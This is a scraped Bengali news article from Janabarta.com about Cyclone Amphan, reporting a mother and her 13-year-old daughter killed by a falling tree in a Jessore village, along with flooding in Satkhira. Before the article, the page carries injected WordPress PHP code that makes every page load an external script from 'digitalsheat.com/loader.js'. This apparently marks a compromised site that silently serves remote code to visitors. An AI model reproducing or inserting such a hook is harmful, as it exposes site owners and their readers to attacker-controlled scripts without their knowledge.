// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site ঘূর্ণিঝড় আম্পান: গাছের নিচে চাপা পড়ে মা-মেয়ের মৃত্যু - Janabarta.com

ঘূর্ণিঝড় আম্পান: গাছের নিচে চাপা পড়ে মা-মেয়ের মৃত্যু

নিজস্ব প্রতিবেদক: দেশের উপকূলীয় জেলাগুলোতে ব্যাপক তাণ্ডব চালাচ্ছে বঙ্গোপসাগরে সৃষ্ট ঘূর্ণিঝড় আম্পান। এর মধ্যে যশোরে ১৩৫ কিলোমিটার বেগে প্রচণ্ড বেগে ঝড় বইছে। বুধবার সারাদিন থেমে থেমে ঝড়ো হাওয়া ও বৃষ্টিপাত হলেও রাত বাড়ার সাথে সাথে ঝড়ো হাওয়া ও বৃষ্টিপাতের পরিমাণ বাড়তে থাকে।

স্থানীয় আবহাওয়া অফিসের বরাতে জানা যায়, এই মুহূর্তে যশোরে সর্বোচ্চ ১৩৫ কিলোমিটার বেগে ঝড়ো হওয়া বইছে। জেলার বিভিন্ন এলাকায় গাছপালা, ঘরবাড়ি ভেঙে গেছে। চৌগাছা উপজেলার চানপুর গ্রামে গাছের নিচে চাপা পড়ে মা ও মেয়ের মৃত্যুর খবর পাওয়া গেছে।

তথ্যটি নিশ্চিত করে স্থানীয়রা জানান, চানপুর গ্রামের মৃত ওয়াজেদ হোসেনের বাড়ির ওপর গাছ ভেঙে পড়েছে। এতে গাছের নিচে চাপা পড়ে ঘটনাস্থলেই ওয়াজেদ হোসেনের স্ত্রী খ্যান্ত বেগম (৪৬) ও তার মেয়ে রাবেয়া (১৩) মৃত্যুবরণ করেন।

এ বিষয়ে চৌগাছা থানা পুলিশের ভারপ্রাপ্ত কর্মকর্তা (ওসি) রিফাত থান রাজীব বলেন, মৃত্যুর সংবাদ শুনেছেন। কিন্তু ঝড়ের কারণে এখনো ঘটনাস্থলে যাওয়া সম্ভব হয়নি। তাই মৃত্যুর বিষয়টি নিশ্চিত করা যাচ্ছে না।

এদিকে ঘূর্ণিঝড় আম্পানের তাণ্ডবে পার্শ্ববর্তী সাতক্ষীরা জেলার বিভিন্ন এলাকায় বিপুল পরিমাণ গাছপালা ও ঘরবাড়ি বিধ্বস্ত হয়ে গেছে। ইতোমধ্যে শতাধিক গ্রাম প্লাবিত ও উপকূলীয় এলাকার বাঁধগুলোর অর্ধশত পয়েন্ট ভেঙে গেছে। স্থলভাগে ব্যাপক হারে পানি প্রবেশ করছে।